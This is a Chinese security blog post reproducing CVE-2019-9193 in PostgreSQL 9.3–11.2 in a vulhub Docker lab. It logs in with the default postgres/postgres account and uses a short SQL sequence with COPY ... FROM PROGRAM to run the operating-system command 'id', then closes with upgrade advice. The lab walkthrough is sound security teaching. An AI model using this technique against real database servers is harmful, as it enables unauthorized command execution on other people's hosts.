PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现

admin 2021年4月30日09:37:48评论158 views字数 677阅读2分15秒阅读模式

简介

 

PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。

 

影响版本


9.3-11.2



漏洞概述


PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

 

环境搭建

 

进入目录并启动环境

cd vulhub-master/postgres/CVE-2019-9193/docker-compose up -d

PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现

环境启动后,将开启Postgres默认的5432端口,默认账号密码为postgres/postgres。


漏洞复现

 

首先连接到postgres中

psql --host 192.168.204.136  --username postgres


执行如下语句,FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中:

DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'id';SELECT * FROM cmd_exec;

PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现

成功执行命令

 

修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月30日09:37:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现http://cn-sec.com/archives/255945.html

发表评论

匿名网友 填写信息